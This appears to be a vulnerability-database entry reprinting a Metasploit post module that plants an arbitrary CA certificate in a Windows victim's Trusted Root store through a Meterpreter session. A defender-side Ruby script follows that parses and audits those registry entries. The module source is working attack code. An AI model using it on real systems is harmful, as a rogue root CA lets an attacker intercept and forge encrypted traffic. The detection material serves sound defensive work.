Windows Manage Certificate Authority Injection

Published 23 Oct 2011 17:17:32. Reported by vt. Type: metasploit. Source: www.rapid7.com

The Windows Manage Certificate Authority Injection post module allows an attacker with a Meterpreter session to insert an arbitrary CA certificate into the victim's Trusted Root store. It does so by writing a REG_BINARY Blob value under HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\ROOT\Certificates\<SHA-1 thumbprint>, so auditing that key for unexpected thumbprints is where a defender would see the change.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Certificate Authority Injection',
        'Description' => %q{
          This module allows the attacker to insert an arbitrary CA certificate
          into the victim's Trusted Root store.
        },
        'License' => BSD_LICENSE,
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_registry_create_key
              stdapi_registry_open_key
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('CAFILE', [ true, 'Path to the certificate you wish to install as a Trusted Root CA.', ''])
      ]
    )
  end

  def run
    certfile = datastore['CAFILE']

    # Check file path
    begin
      ::File.stat(certfile)
    rescue StandardError
      print_error('CAFILE not found')
      return
    end

    # Load the file and parse it as an X.509 certificate
    cert = ::File.binread(certfile)
    loadedcert = OpenSSL::X509::Certificate.new(cert)
    der = loadedcert.to_der

    # The Subject Key Identifier is stored as CERT_KEY_IDENTIFIER_PROP_ID; look it
    # up by OID instead of assuming it is the first extension in the certificate.
    ski_ext = loadedcert.extensions.find { |e| e.oid == 'subjectKeyIdentifier' }
    if ski_ext.nil?
      print_error('Certificate has no Subject Key Identifier extension')
      return
    end
    ski = [ski_ext.value.delete(':')].pack('H*')

    # The registry Blob is a sequence of properties, each laid out as
    # propid (DWORD), flags (DWORD, always 1), cb (DWORD), then cb bytes of data.
    prop = lambda { |propid, data| [propid, 1, data.bytesize].pack('VVV') + data }

    blob = prop.call(0x04, Digest::MD5.digest(der))   # CERT_MD5_HASH_PROP_ID
    blob << prop.call(0x03, Digest::SHA1.digest(der)) # CERT_SHA1_HASH_PROP_ID
    blob << prop.call(0x14, ski)                      # CERT_KEY_IDENTIFIER_PROP_ID
    blob << prop.call(0x20, der)                      # CERT_CERT_PROP_ID (DER certificate)

    # The subkey name is the uppercase hex SHA-1 thumbprint of the certificate
    cleancertsha1 = Digest::SHA1.hexdigest(der).upcase
    catree = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'
    entire_key = "#{catree}\\#{cleancertsha1}"
    root_key, base_key = client.sys.registry.splitkey(entire_key)

    # Perform the registry operations

    # Ensure the cert doesn't already exist
    begin
      open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)
      unless open_key.enum_value.empty?
        print_error("Key already exists: #{entire_key}")
        return
      end
    rescue StandardError
      # open_key raises when the subkey is absent, which is the expected case
    end

    # Create (or reopen) the thumbprint subkey and write the Blob value
    open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE)
    print_good("Successfully created key: #{entire_key}")
    open_key.set_value('Blob', REG_BINARY, blob)
    print_good('CA inserted!')
  end
end
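As an added defender-side example (not part of the Metasploit module above), the Ruby below parses the Blob layout the module writes (propid, flags, cb, data per property) and audits one ROOT\Certificates entry: it extracts the embedded certificate and checks that the subkey name and the stored SHA-1 property match the certificate's real thumbprint. The CERT_*_PROP_ID names are the Windows constant names for the IDs 0x03 and 0x20 used in the module; sample_entry is a constructed self-signed certificate and Blob so the audit runs offline.

```ruby
require 'openssl'
require 'digest'

# Property IDs found in HKLM\...\SystemCertificates\ROOT\Certificates\<SHA1>\Blob
CERT_SHA1_HASH_PROP_ID = 0x03
CERT_CERT_PROP_ID      = 0x20

# Parse a Blob into { propid => data }: each property is propid, flags, cb (DWORDs, LE) then cb bytes.
def parse_cert_blob(blob)
  props, off = {}, 0
  while off + 12 <= blob.bytesize
    propid, _flags, cb = blob.byteslice(off, 12).unpack('VVV')
    off += 12
    raise ArgumentError, 'truncated property' if off + cb > blob.bytesize
    props[propid] = blob.byteslice(off, cb)
    off += cb
  end
  props
end

# Audit one entry: key_name is the subkey (SHA-1 thumbprint), blob its Blob value.
# Reports the embedded certificate and whether the stored identifiers agree with it.
def audit_root_entry(key_name, blob)
  props = parse_cert_blob(blob)
  der = props[CERT_CERT_PROP_ID] or raise ArgumentError, 'no certificate in blob'
  cert = OpenSSL::X509::Certificate.new(der)
  thumb = Digest::SHA1.hexdigest(der).upcase
  {
    subject: cert.subject.to_s,
    thumbprint: thumb,
    self_signed: cert.issuer == cert.subject,
    key_matches: key_name.upcase == thumb,
    hash_prop_matches: props[CERT_SHA1_HASH_PROP_ID]&.unpack1('H*')&.upcase == thumb
  }
end

# Constructed sample (not a real entry): throwaway self-signed CA plus a Blob in the same layout.
def sample_entry
  key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.serial = 1
  cert.subject = cert.issuer = OpenSSL::X509::Name.parse('/CN=Constructed Test Root')
  cert.public_key = key.public_key
  cert.not_before, cert.not_after = Time.now, Time.now + 3600
  der = cert.sign(key, OpenSSL::Digest.new('SHA256')).to_der
  blob = [CERT_SHA1_HASH_PROP_ID, 1, 20].pack('VVV') + Digest::SHA1.digest(der)
  blob << [CERT_CERT_PROP_ID, 1, der.bytesize].pack('VVV') + der
  [Digest::SHA1.hexdigest(der).upcase, blob]
end
```

On a live host the input is each subkey name and its Blob value under that registry path; an entry with an unfamiliar subject, or where key_matches or hash_prop_matches is false, deserves investigation.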

Updated 08 Feb 2023 13:47 (current revision). Risk: Low (Vulners AI Score 1).